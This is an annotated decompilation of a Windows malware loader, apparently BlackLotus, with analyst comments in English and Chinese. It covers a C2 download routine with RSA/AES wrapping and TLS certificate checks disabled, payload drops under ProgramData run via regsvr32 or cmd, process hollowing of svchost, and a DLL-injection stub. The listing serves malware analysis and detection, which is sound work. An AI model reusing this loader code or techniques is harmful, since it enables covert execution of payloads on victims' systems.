}

command_type1_140006318

// Command type 1: download the payload referenced by the parsed C2 message
// (wsvalue), stage it, and launch it in the requested security context.
//
//   Method   '1' -> run from memory (suspended host + hollow/inject)
//            '2' -> drop to \??\<drive>:\ProgramData\<File>.<FileType> and run
//   FileType "exe" / "dll" / "sys" / other (only the first 3 chars are compared);
//            "sys" is diverted to sys_140006980 and never reaches a user-mode
//            launcher
//   User     '2','3' -> AdminPrivilege_2_3_140006640 thread (every logged-on
//                       user; '3' additionally requires an Administrators token)
//            '4','5' -> privilege_4_5_140006804 thread (first active session;
//                       '5' additionally requires an Administrators token)
//            anything else -> launch_14000691C in the current context
//
// Ownership of `parameter`: handed to the worker thread (each of the three
// launchers frees it with free_140007354); freed here only when no launcher
// was started (v4 == 0). The thread handle is closed immediately; the thread
// keeps running.
void __fastcall command_type1_140006318(HttpST *httpst, WsValue *wsvalue)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  Handle = 0i64;
  v4 = 0;
  // 0x40-byte ThreadParameter; zero-filled is NOT requested (flag 8 only)
  Heap = (ThreadParameter *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x40ui64);
  parameter = Heap;
  if ( Heap )
  {
    p_datasz = (ULONG *)&Heap->datasz;
    // fetch + AES-decrypt the payload; datasz receives the plaintext length
    Data_by_auth_token = getData_by_auth_token_140004108(httpst, wsvalue, &Heap->datasz);
    parameter->data = Data_by_auth_token;
    if ( Data_by_auth_token )
    {
      // sys_140006980 returns 1 for FileType "sys" (kernel-side load), which
      // short-circuits everything below
      if ( *p_datasz && !(unsigned int)sys_140006980(wsvalue, parameter) )
      {
        v9 = *p_datasz;
        *(_WORD *)&parameter->Method = *wsvalue->Method;
        // bitness decided from the PE header of the downloaded image
        parameter->isX86 = isPEx86_140003C1C((__int64)parameter->data, v9);
        FileType = wsvalue->FileType;
        // FileType-->dll  (prefix match on "dll"; "dllx" also qualifies)
        if ( *FileType != 'd' || FileType[1] != 'l' || (v11 = FileType[2] == 'l', v12 = 1, !v11) )
          v12 = 0;

        parameter->isDll = v12;
        v13 = wsvalue->FileType;
        // FileType-->exe (same prefix match)
        if ( *v13 != 'e' || v13[1] != 'x' || (v11 = v13[2] == 'e', v14 = 1, !v11) )
          v14 = 0;

        parameter->isEXE = v14;
        parameter->isUser3or5 = 0;
        if ( *wsvalue->Method == '2' )          // save to disk, then run
        {
          //  \??\%c:\ProgramData\%s.%s
          // drivenumber wsvalue->File, wsvalue->FileType
          // returns the NT path the file was written to (heap), NULL on failure
          v15 = savefile_1400088C4(parameter->data, *p_datasz, wsvalue);
          parameter->path = v15;
          if ( !v15 )
            goto END;

          if ( !parameter->isEXE )
          {                                     // dll (or any non-exe): needs a launcher prefix
            // 0x64 bytes = 50 wide chars for the prefix
            v16 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x64ui64);
            parameter->cmd_prefix = v16;
            if ( !v16 )
              goto END;

            // regsvr32 /s
            v17 = word_14000B5A0;
            if ( !parameter->isDll )            // isDll
              // cmd /c
              v17 = word_14000B5C0;

            // 13 / 8 = obfuscated length of "regsvr32 /s " vs "cmd /c "
            v18 = deobfuscate_wstring((WORD *)v17, parameter->isDll != 0 ? 13 : 8, 1);
            cmd_prefix = parameter->cmd_prefix;
            // '2' here is the decompiler printing the integer 50: the copy is
            // bounded to 50 wide chars (the buffer size), not the character '2'.
            // The 0xFFFFFFFF80000034 test looks like an inlined bounded-copy
            // guard (wcsncpy-style) rather than program logic.
            v20 = '2';
            do
            {
              if ( v20 == 0xFFFFFFFF80000034ui64 )
                break;

              if ( !*v18 )
                break;

              *cmd_prefix++ = *v18++;
              --v20;
            }
            while ( v20 );

            // NUL-terminate: overwrite the last char if the bound was hit,
            // otherwise terminate after the last copied char
            v21 = cmd_prefix - 1;
            if ( v20 )
              v21 = cmd_prefix;

            *v21 = 0;
          }
        }
        else
        {                                       // in-memory load: nothing is written to disk
          // 0x208 bytes = 260 wide chars (MAX_PATH) for the host image path
          v22 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x208ui64);
          parameter->path = v22;
          if ( !v22 )
            goto END;

          // host process for the hollow/inject is svchost.exe, chosen by payload bitness
          *parameter->path = ret_disk_drivenumber_140008000();
          // :\Windows\System32\svchost.exe
          v23 = x64svchost_14000B5E0;
          if ( parameter->isX86 )               // isx86
            // :\Windows\SysWOW64\svchost.exe
            v23 = x86svchost_14000B620;

          v24 = deobfuscate_wstring((WORD *)v23, 0x1Fu, 1);
          wscat(parameter->path, 260i64, (__int64)v24);
        }

        cmd_line_b64dec = wsvalue->cmd_line_b64dec;
        // 32 == ' ': the decoded command line is only honoured when it starts
        // with a space, so that it appends cleanly after the image path
        if ( *cmd_line_b64dec == 32 )
        {
          v26 = wcslen(cmd_line_b64dec);
          v27 = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v26 + 1));
          parameter->cmdline = v27;
          if ( !v27 )
            goto END;

          v28 = wcslen(wsvalue->cmd_line_b64dec);
          // NOTE(review): as decompiled the 2nd/3rd arguments are swapped
          // (length in the src slot); read as wcsncpy(dst, src, len + 1) —
          // confirm against the disassembly
          wcsncpy_0(parameter->cmdline, (const wchar_t *)(unsigned int)(v28 + 1), (size_t)wsvalue->cmd_line_b64dec);
        }

        // from here on a launcher owns `parameter`
        v4 = 1;
        if ( *wsvalue->User != '2' )
        {
          if ( *wsvalue->User != '3' )
          {
            if ( *wsvalue->User != '4' )
            {
              if ( *wsvalue->User != '5' )
              {
                launch_14000691C(parameter);    // 0,1,>5: run synchronously in the current context
                goto END;
              }

              parameter->isUser3or5 = 1;        // 5: first active session, admin required
            }

            lpStartAddress = privilege_4_5_140006804;// 4 5
            goto LABEL_42;
          }

          parameter->isUser3or5 = 1;            // 3: every logged-on user, admin required
        }

        lpStartAddress = AdminPrivilege_2_3_140006640;// user2 3

LABEL_42:
        // 0x1FFFFF = THREAD_ALL_ACCESS, -1 = current process; the launcher
        // runs on its own thread so the C2 loop is not blocked by Sleep()
        // polling inside it
        NtCreateThreadEx(
          &Handle,
          0x1FFFFFu,
          0i64,
          (HANDLE)0xFFFFFFFFFFFFFFFFi64,
          lpStartAddress,
          parameter,
          0,
          0i64,
          0i64,
          0i64,
          0i64);
      }
    }
  }

END:
  if ( Handle )
    NtClose(Handle);

  // only free when no launcher took ownership
  if ( !v4 )
  {
    if ( parameter )
      free_140007354(parameter);
  }
}
getData_by_auth_token_140004108
// Downloads the encrypted payload for the current command from the C2.
//
// Request : POST <httpst->DataST_20.pwszObjectName>
//           Content-Type: application/x-www-form-urlencoded
//           body = <10-byte deobfuscated prefix, byte_14000AFD0 — presumably
//                   the form field name> + urlencode(base64(RSA({"auth_token":"<tok>"})))
// Response: must be HTTP 200; the body is AES-256-CBC ciphertext, decrypted
//           with the key carried IN THE SAME C2 MESSAGE (wsvalue->aes_key,
//           base64, must decode to exactly 32 bytes). The key travelling with
//           the command means this layer is transport obfuscation, not secrecy
//           against anyone who can read the command channel.
//
// Returns the decrypted payload (process heap, caller frees) and stores its
// length in *decsz; NULL on any failure (*decsz is then left untouched).
//
// Detection note: server certificate validation is switched off entirely
// (see the WinHttpSetOption call), so the C2 traffic can be intercepted with
// any self-signed certificate during analysis.
PVOID __fastcall getData_by_auth_token_140004108(HttpST *httpst, WsValue *wsvalue, _DWORD *decsz)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v32 = 4;                                      // sizeof(DWORD) for the status-code query
  v37 = 0;
  auth_token = wsvalue->auth_token;
  v5 = 0i64;
  Data = 0i64;
  // two packed DWORDs: low = bytes received (filled by get_HttpReadData),
  // high = 0x21 = capacity of the v33 key buffer handed to CryptStringToBinaryW
  outsz = 0x2100000000i64;
  hRequest = 0i64;
  v30 = 0;
  // token limited to < 50 wide chars so the formatted JSON fits the 100-char Str
  if ( (unsigned int)wcslen(auth_token) < 0x32 )
  {
    // {"auth_token":"%s"}
    v9 = deobfuscate_wstring(word_14000AFA0, 0x14u, 1);
    snwprintf(Str, 0x64u, v9, wsvalue->auth_token);
    wcslen(Str);
    // RSA-encrypt the JSON with the embedded public key, then base64 (helper
    // not in this listing)
    v10 = rsaenc_base64_140001370(Str);
    if ( v10 )
    {
      v11 = urlenc_140005498(v10, 1);
      v12 = (char *)v11;
      if ( v11 )
      {
        // room for the 10-byte prefix + encoded blob + NUL
        v13 = strlen(v11) + 20;
        Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v13);
        if ( Heap )
        {
          v15 = deobfuscate_bytes(byte_14000AFD0, 0xAu, 1);
          // inlined bounded copy of the prefix into Heap; the
          // `2147483646 - v13 + v16` test is the decompiler's rendering of the
          // copy-bound guard, not program logic
          if ( v13 )
          {
            if ( v13 <= 0x7FFFFFFF )
            {
              v16 = v13;
              v17 = Heap;
              v18 = v15 - (BYTE *)Heap;
              do
              {
                if ( !(2147483646 - v13 + v16) )
                  break;

                v19 = v17[v18];
                if ( !v19 )
                  break;

                *v17++ = v19;
                --v16;
              }
              while ( v16 );

              v20 = v17 - 1;
              if ( v16 )
                v20 = v17;

              *v20 = 0;
            }
            else
            {
              *Heap = 0;
            }
          }

          // NOTE(review): the 2nd argument is printed as the length variable,
          // which cannot be right; the register most likely still holds v12
          // (the URL-encoded RSA blob) — confirm in the disassembly
          strcat(Heap, (const char *)v13);
          // 8388864 = 0x800100 = WINHTTP_FLAG_SECURE | WINHTTP_FLAG_REFRESH
          // 256      = WINHTTP_FLAG_REFRESH (plain HTTP)
          v21 = httpst->DataST_20.sslflag != 0 ? 8388864 : 256;
          v22 = deobfuscate_wstring(POST_14000AFE0, 5u, 1);
          v23 = WinHttpOpenRequest(httpst->hConnect, v22, httpst->DataST_20.pwszObjectName, 0i64, 0i64, 0i64, v21);
          hRequest = v23;
          if ( v23 )
          {
            // 0x1F = WINHTTP_OPTION_SECURITY_FLAGS
            // 13056 = 0x3300 = SECURITY_FLAG_IGNORE_UNKNOWN_CA (0x100)
            //                | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE (0x200)
            //                | SECURITY_FLAG_IGNORE_CERT_CN_INVALID (0x1000)
            //                | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID (0x2000)
            // i.e. every TLS certificate check is disabled
            v31 = 13056;
            if ( WinHttpSetOption(v23, 0x1Fu, &v31, 4u) )
            {
              // Content-Type: application/x-www-form-urlencoded
              v24 = deobfuscate_wstring(Content_Type_14000AFF0, 0x30u, 1);
              v25 = strlen(Heap);
              v26 = strlen(Heap);
              // 0xFFFFFFFF = header length -1 (NUL-terminated); body = Heap
              if ( WinHttpSendRequest(hRequest, v24, 0xFFFFFFFF, Heap, v26, v25, 0i64) )
              {
                if ( WinHttpReceiveResponse(hRequest, 0i64) )
                {
                  // 0x20000013 = WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER
                  if ( WinHttpQueryHeaders(hRequest, 0x20000013u, 0i64, &v37, &v32, 0i64) )
                  {
                    if ( v37 == 200 )
                    {
                      // read the whole body; low DWORD of outsz = its length
                      Data = (CHAR *)get_HttpReadData(hRequest, (unsigned int *)&outsz);
                      if ( Data )
                      {
                        v27 = outsz;
                        if ( (_DWORD)outsz )
                        {
                          // base64-decode the key from the C2 message into v33;
                          // the decoded length lands in HIDWORD(outsz)
                          if ( CryptStringToBinaryW(wsvalue->aes_key, 0, 1u, v33, (DWORD *)&outsz + 1, 0i64, 0i64) )
                          {
                            // AES-256 requires exactly 32 key bytes
                            if ( HIDWORD(outsz) == 32 )
                            {
                              v5 = AESCBC256_dec_recvdata_140001060(Data, v33, v27, &v30);
                              if ( v5 )
                                *decsz = v30;
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }

        // cleanup; the ciphertext buffer is released, the plaintext (v5) is returned
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v12);
        if ( Heap )
          RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

        if ( Data )
          RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Data);

        if ( hRequest )
          WinHttpCloseHandle(hRequest);
      }
    }
  }

  return v5;
}
sys_140006980

FileType 为 sys 的载荷不走用户态启动路径：先校验为非 .NET 的 PE，打上 'I' 标记并附上长度后，通过 evnet_section_2sys_1400082F0 交给 BlackLotus 内核组件加载。只要 FileType 以 "sys" 开头该函数就返回 1（不管内核侧是否成功），调用方据此跳过所有用户态加载逻辑。

// Diverts ".sys" payloads to the kernel-side loader.
//
// Returns 1 whenever FileType starts with "sys" — even if the PE check failed
// and nothing was handed over — so the caller skips every user-mode launcher.
// Returns 0 for any other FileType. The kernel side of the hand-off
// (evnet_section_2sys_1400082F0) is not part of this listing.
__int64 __fastcall sys_140006980(WsValue *wsvalue, ThreadParameter *Parameter)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  FileType = wsvalue->FileType;
  v3 = 0;
  // sys: 0x00790073 is L"sy" read as a little-endian DWORD ('s'=0x73, 'y'=0x79),
  // then FileType[2] == 's'. Only the first three characters are compared.
  if ( *(_DWORD *)FileType == 0x790073 && FileType[2] == 0x73 )
  {
    v3 = 1;
    // sectiondata = 16-byte header (tag + datasz) followed by the raw image
    Heap = (sectiondata *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, (unsigned int)Parameter->datasz + 16i64);
    if ( Heap )
    {
      // MZ/PE sanity check; managed (.NET) images are rejected
      if ( (unsigned int)isTargetPEType_140003F60((__int64)Parameter->data, Parameter->datasz) )
      {
        // 'I' presumably tags the request type for the kernel component
        Heap->tag[0] = 'I';
        Heap->datasz = Parameter->datasz;
        // byte copy of the driver image despite the wchar_t cast (decompiler typing)
        strcpyWs_14000102C(Heap->data, (wchar_t *)Parameter->data, (unsigned int)Parameter->datasz);
        evnet_section_2sys_1400082F0(Heap);
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
    }
  }

  return v3;
}
savefile_1400088C4

把载荷写到 \??\<盘符>:\ProgramData\<File>.<FileType>（NtCreateFile 以 FILE_CREATE 打开，同名文件已存在则失败），成功后返回该 NT 路径的堆拷贝。File 与 FileType 直接取自 C2 消息，可见代码中没有对路径分隔符或 ".." 做任何过滤。

// Writes `data` (sz bytes) to \??\<drive>:\ProgramData\<File>.<FileType> and
// returns a heap copy of that NT path (caller frees), or NULL on failure.
//
// File and FileType come straight from the C2 message; no filtering of path
// separators or ".." is visible here, so the drop location is whatever the
// operator chose, bounded only by the 260-char format buffer.
//
// IOC: a new FILE_ATTRIBUTE_NORMAL file under ProgramData, created with
// FILE_CREATE (the call fails if the name already exists — no overwrite) and
// share mode 0.
_WORD *__fastcall savefile_1400088C4(void *data, ULONG sz, WsValue *wsvalue)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  FileHandle = 0i64;
  v6 = 0i64;
  // \??\%c:\ProgramData\%s.%s
  v7 = deobfuscate_wstring(word_14000B690, 0x1Au, 1);
  v8 = ret_disk_drivenumber_140008000();        // system drive letter
  v9 = v7;
  v10 = 260i64;                                 // copy bound used below (MAX_PATH chars)
  snwprintf(&v20, 0x104u, v9, v8, wsvalue->File, wsvalue->FileType);
  RtlInitUnicodeString(&v17, &v20);
  ObjectAttributes.Length = 48;                 // sizeof(OBJECT_ATTRIBUTES) on x64
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.Attributes = 64;             // OBJ_CASE_INSENSITIVE
  ObjectAttributes.ObjectName = &v17;
  *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
  // DesiredAccess 0x120116 = SYNCHRONIZE | READ_CONTROL | FILE_WRITE_DATA
  //                        | FILE_APPEND_DATA | FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES
  // FileAttributes 0x80    = FILE_ATTRIBUTE_NORMAL
  // ShareAccess 0          = exclusive
  // CreateDisposition 2    = FILE_CREATE
  // CreateOptions 0x860    = FILE_RANDOM_ACCESS | FILE_NON_DIRECTORY_FILE
  //                        | FILE_SYNCHRONOUS_IO_NONALERT
  if ( NtCreateFile(&FileHandle, 0x120116u, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 2u, 0, 0x860u, 0i64, 0) >= 0
    && NtWriteFile(FileHandle, 0i64, 0i64, 0i64, &IoStatusBlock, data, sz, 0i64, 0i64) >= 0 )
  {
    // 0x20A bytes = 261 wide chars: bounded copy of the formatted path
    // (v21 as decompiled — presumably the same buffer as v20) for the caller
    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x20Aui64);
    v6 = Heap;
    if ( Heap )
    {
      v12 = Heap;
      v13 = (char *)(v21 - (char *)Heap);
      do
      {
        // inlined bounded-copy guard (decompiler artifact), not program logic
        if ( v10 == 0xFFFFFFFF80000106ui64 )
          break;

        v14 = *(_WORD *)((char *)v12 + (_QWORD)v13);
        if ( !v14 )
          break;

        *v12++ = v14;
        --v10;
      }
      while ( v10 );

      // NUL-terminate (overwrite the last char if the bound was hit)
      v15 = v12 - 1;
      if ( v10 )
        v15 = v12;

      *v15 = 0;
    }
  }

  if ( FileHandle )
    NtClose(FileHandle);

  return v6;
}
launch_14000691C
// Runs the staged payload in the caller's own security context (NULL token,
// NULL environment block — CreateProcessAsUserW with a NULL token presumably
// behaves like CreateProcessW; confirm if it matters for attribution).
//
//   Method '1' : create parameter->path suspended and replace/inject the
//                in-memory PE (load_Terminate_14000368C)
//   Method '2' : start the dropped file / regsvr32 / cmd command line
//   other      : nothing
//
// Always frees `parameter`; the caller must not use it afterwards.
void __fastcall launch_14000691C(ThreadParameter *parameter)
{
  bool v1; // zf
  struct _PROCESS_INFORMATION lpProcessInformation; // [rsp+20h] [rbp-28h] BYREF

  // user1
  v1 = *(_WORD *)&parameter->Method == '1';     // Process Hollowing
  memset(&lpProcessInformation, 0, sizeof(lpProcessInformation));
  if ( v1 )
  {
    // suspended host first; load_Terminate kills it if the loader fails
    if ( (unsigned int)Create_ProcessAsUserW_method1_suspended_140006F88(0i64, 0i64, parameter, &lpProcessInformation) )
      load_Terminate_14000368C(parameter, &lpProcessInformation);
  }

  else if ( *(_WORD *)&parameter->Method == '2' )// run
  {
    Create_ProcessAsUserW_method2_140006E0C(0i64, 0i64, parameter);
  }

  free_140007354(parameter);
}
Create_ProcessAsUserW_method1_suspended_140006F88
// Creates the host process for an in-memory load, SUSPENDED, under hToken and
// lpEnvironment (both may be NULL). Command line = parameter->path followed by
// parameter->cmdline when present. Returns 1 on success, 0 otherwise (v7 is
// never set to anything else).
//
// NOTE(review): lpCommandLine is not among the visible declarations; if it is
// a file-scope buffer (0x212 wide chars), the launcher threads started by
// command_type1_140006318 race on it — confirm.
__int64 __fastcall Create_ProcessAsUserW_method1_suspended_140006F88(
        HANDLE hToken,
        void *lpEnvironment,
        ThreadParameter *parameter,
        struct _PROCESS_INFORMATION *lpProcessInformation)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v7 = 0;
  memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
  v9 = lpCommandLine;
  v10 = 0x212i64;                               // copy bound = 530 wide chars
  // bounded copy of parameter->path into lpCommandLine; the
  // 0xFFFFFFFF80000214 test is an inlined copy guard, not program logic
  v11 = (char *)parameter->path - (char *)lpCommandLine;
  do
  {
    if ( v10 == 0xFFFFFFFF80000214ui64 )
      break;

    v12 = *(wchar_t *)((char *)v9 + v11);
    if ( !v12 )
      break;

    *v9++ = v12;
    --v10;
  }
  while ( v10 );

  cmdline = parameter->cmdline;
  // NUL-terminate (overwrite the last char if the bound was hit)
  v14 = v9 - 1;
  if ( v10 )
    v14 = v9;

  *v14 = 0;
  // cmdline already starts with ' ' (checked by the caller), so plain append
  if ( cmdline )
    wscat(lpCommandLine, 0x212i64, (__int64)cmdline);

  if ( CreateProcessAsUserW(
         hToken,
         0i64,
         lpCommandLine,
         0i64,
         0i64,
         0,
         0x2000424u,                            // CREATE_PRESERVE_CODE_AUTHZ_LEVEL
                                                // 0x02000000
                                                // CREATE_UNICODE_ENVIRONMENT
                                                // 0x00000400
                                                // #define NORMAL_PRIORITY_CLASS             0x00000020
                                                // CREATE_SUSPENDED
                                                // 0x00000004
         lpEnvironment,
         0i64,
         &lpStartupInfo,
         lpProcessInformation) )
  {
    // hProcess/hThread are handed to load_Terminate_14000368C, which closes them
    return 1;
  }

  return v7;
}
load_Terminate_14000368C
// Loads the in-memory PE into the suspended host, dispatching on bitness and
// image type:
//   x86 exe -> x86exe_hollow_140003D1C    x86 dll -> x86dll_140003728
//   x64 exe -> x64exe_hollow_140003E38    x64 dll -> x64dll_140003890
// Managed (.NET) images are rejected by isTargetPEType_140003F60. If the
// pre-check or the loader fails, the host is killed with
// NtTerminateProcess(hProcess, -1) so no suspended svchost is left behind.
// Both PROCESS_INFORMATION handles are closed afterwards.
//
// Return value: overwritten by the NtClose results, so callers cannot tell
// success from failure through it (none of the visible callers try).
NTSTATUS __fastcall load_Terminate_14000368C(
        ThreadParameter *parameter,
        struct _PROCESS_INFORMATION *lpProcessInformation)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  data = (char *)parameter->data;
  // ntheader = data + e_lfanew (the 16th DWORD of the DOS header, offset 0x3C)
  if ( !(unsigned int)isTargetPEType_140003F60((__int64)data, parameter->datasz)
    || ((isDll = parameter->isDll, ntheader = (_IMAGE_NT_HEADERS *)&data[*((int *)data + 15)], parameter->isX86) ? (!isDll ? (result = x86exe_hollow_140003D1C(lpProcessInformation, data, ntheader)) : (result = x86dll_140003728(lpProcessInformation, data, ntheader))) : !isDll ? (result = x64exe_hollow_140003E38(lpProcessInformation, data, (_IMAGE_NT_HEADERS64 *)ntheader)) : (result = x64dll_140003890(lpProcessInformation, data, (_IMAGE_NT_HEADERS64 *)ntheader)),
        !result) )
  {
    // loader failed: do not leave a suspended host process around
    result = NtTerminateProcess(lpProcessInformation->hProcess, -1);
  }

  if ( lpProcessInformation->hProcess )
    result = NtClose(lpProcessInformation->hProcess);

  hThread = lpProcessInformation->hThread;
  if ( hThread )
    return NtClose(hThread);

  return result;
}


// Accepts a buffer as a loadable native PE: at least 0x210 bytes, "MZ" at
// offset 0, "PE\0\0" at e_lfanew, and NOT a managed (.NET) image — i.e. the
// IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR entry is absent (fewer than 15
// directories) or has a zero VirtualAddress. Returns 1 when acceptable, 0 otherwise.
//
// The header is typed as 64-bit for both bitnesses; for 32-bit images the
// decompiler's field names are misleading but the offsets are right:
//   HIDWORD(OptionalHeader.SizeOfHeapReserve) -> offset 0x5C
//     = IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes
//   OptionalHeader.DataDirectory[12] (64-bit layout) -> offset 0xD0
//     = IMAGE_OPTIONAL_HEADER32.DataDirectory[14] (COM descriptor)
//
// NOTE(review): e_lfanew is not bounded against sz (only sz >= 0x210 is
// enforced), so a crafted header can make the signature read fall outside
// the buffer.
__int64 __fastcall isTargetPEType_140003F60(__int64 a1, unsigned int sz)
{
  unsigned int v2; // ebx
  _IMAGE_NT_HEADERS64 *v3; // rdi
  __int64 v4; // rax

  v2 = 0;
  if ( sz >= 0x210 && *(_WORD *)a1 == 0x5A4D )
  {
    v3 = (_IMAGE_NT_HEADERS64 *)(a1 + *(int *)(a1 + 0x3C));
    if ( v3->Signature == 0x4550 )
    {
      if ( (unsigned int)isPEx86_140003C1C(a1, sz) )
      {                                         // x86
        v4 = (__int64)&v3->OptionalHeader.DataDirectory[12];// struct IMAGE_DATA_DIRECTORY COMRuntimedescriptor
        // 32-bit NumberOfRvaAndSizes < 15 -> no COM descriptor entry -> native
        if ( HIDWORD(v3->OptionalHeader.SizeOfHeapReserve) <= 0xE )
          v4 = 0i64;
      }
      else                                      // x64
      {
        if ( v3->OptionalHeader.NumberOfRvaAndSizes <= 14 )
          return 1;

        v4 = (__int64)&v3->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR];// struct IMAGE_DATA_DIRECTORY COMRuntimedescriptor
      }

      // zero VirtualAddress -> not managed
      if ( !v4 || !*(_DWORD *)v4 )
        return 1;                               // NOT .NET executable
    }
  }

  return v2;
}



// Hollows a suspended WOW64 host with a 32-bit EXE image:
//   1. read the initial thread's WOW64 context,
//   2. get the PEB32 address (ProcessWow64Information),
//   3. map the payload into the host (mapPE32_140003A00, last arg 1),
//   4. overwrite PEB32->ImageBaseAddress (offset 8, 4 bytes) with the new base,
//   5. point EAX — which for a CREATE_SUSPENDED initial thread holds the entry
//      point ntdll will call — at the payload's AddressOfEntryPoint,
//   6. resume the thread.
// Returns 1 on success, 0 otherwise.
//
// No NtUnmapViewOfSection is visible here; unless the mapper does it, the
// original host image stays mapped beside the payload (memory-scan hint:
// PEB image base not matching the image at the original load address).
__int64 __fastcall x86exe_hollow_140003D1C(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *data,
        _IMAGE_NT_HEADERS *ntheader32)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v6 = 0;
  // zero the WOW64_CONTEXT after ContextFlags (Dr0 is at offset 4; 0x2C8 bytes
  // cover the rest of the 0x2CC-byte structure)
  memset(&v9.Dr0, 0, 0x2C8u);
  hThread = lpProcessInformation->hThread;
  ProcessInformation = 0i64;
  v10 = 0i64;
  v9.ContextFlags = CONTEXT_FULL;
  if ( RtlWow64GetThreadContext(hThread, &v9) >= 0
    && NtQueryInformationProcess(lpProcessInformation->hProcess, ProcessWow64Information, &ProcessInformation, 8u, 0i64) >= 0 )
  {
    v10 = mapPE32_140003A00(lpProcessInformation, data, 0i64, ntheader32, 1);
    if ( v10 )
    {
      // PEB32 + 8 = ImageBaseAddress
      if ( NtWriteVirtualMemory(lpProcessInformation->hProcess, (PVOID)(ProcessInformation + 8), &v10, 4ui64, 0i64) >= 0 )
      {
        v9.Eax = (_DWORD)v10 + ntheader32->OptionalHeader.AddressOfEntryPoint;
        if ( RtlWow64SetThreadContext(lpProcessInformation->hThread, &v9) >= 0
          && NtResumeThread(lpProcessInformation->hThread, 0i64) >= 0 )
        {
          return 1;
        }
      }
    }
  }

  return v6;
}


// Loads a 32-bit DLL into the suspended WOW64 host without the Windows loader:
//   1. map the payload (mapPE32_140003A00, last arg 0) and record its base,
//      NT headers and import directory in dll32st,
//   2. map a second, embedded 32-bit stub PE (loaddll_stubpe_data, NT headers
//      at offset dword_14000D04C),
//   3. allocate one RW page in the host (0x3000 = MEM_COMMIT|MEM_RESERVE,
//      4 = PAGE_READWRITE) and write the 0x14-byte DLL32ST into it,
//   4. start a remote thread at the stub's entry point with that page as its
//      argument (0x1FFFFF = THREAD_ALL_ACCESS).
// The stub (decompiled in the comment below) resolves the payload's imports
// through hashed kernel32 lookups and calls DllMain(base, DLL_PROCESS_ATTACH, 0).
// Only imports are fixed up by the stub; relocations, if needed, would have
// to be handled by the mapper. The host's original thread is never resumed
// here, so it stays suspended while the injected thread runs.
// Returns 1 on success, 0 otherwise.
__int64 __fastcall x86dll_140003728(
        struct _PROCESS_INFORMATION *lpProcessInformation,
        char *pedata,
        _IMAGE_NT_HEADERS *ntheader32)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  RegionSize = 4096i64;
  Handle = 0i64;
  BaseAddress = 0i64;
  memset(&dll32st, 0, sizeof(dll32st));
  v4 = (_IMAGE_NT_HEADERS *)&loaddll_stubpe_data[dword_14000D04C];
  v7 = 0;
  v8 = mapPE32_140003A00(lpProcessInformation, pedata, 0i64, ntheader32, 0);
  if ( v8 )
  {
    // e_lfanew is the 16th DWORD of the DOS header
    dll32st.targetpe_ntheader = (_DWORD)v8 + *((_DWORD *)pedata + 15);
    VirtualAddress = ntheader32->OptionalHeader.DataDirectory[1].VirtualAddress;// import table
    dll32st.targetpe_addr = (int)v8;
    dll32st.targetpe_importaddr = (_DWORD)v8 + VirtualAddress;
    v10 = mapPE32_140003A00(lpProcessInformation, loaddll_stubpe_data, 0i64, v4, 0);
    if ( v10 )
    {
      // the parameter page must be addressable by a 32-bit thread argument
      if ( NtAllocateVirtualMemory(lpProcessInformation->hProcess, &BaseAddress, 0i64, &RegionSize, 0x3000u, 4u) >= 0
        && (unsigned __int64)BaseAddress <= 0xFFFFFFFF
        // Decompiled entry point of the stub PE, for reference.
        // Ordinal vs. name imports: `Characteristics >= 0` means the
        // IMAGE_ORDINAL_FLAG32 high bit is clear -> import by name
        // (IMAGE_IMPORT_BY_NAME + 2 skips the Hint); otherwise the low
        // 16 bits are the ordinal.
        // int __stdcall start(DLL32ST *a1)
        // {
        //   // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

        //   targetpe_importaddr = (_IMAGE_IMPORT_DESCRIPTOR *)a1->targetpe_importaddr;
        //   if ( targetpe_importaddr )
        //   {
        //     // KERNEL32.DLL
        //     dllbase = get_dllbase(0x536CD652);          // KERNEL32.DLL BaseNameHashValue : 0x536cd652
        //     if ( !dllbase )
        //       dllbase = get_dllbase(0x8F7EE672);        // kernel32.dll-->0x8f7ee672

        //     a1->GetProcAddress = get_proc_address_by_hash((int)dllbase, 0x80E96588);// GetProcAddress
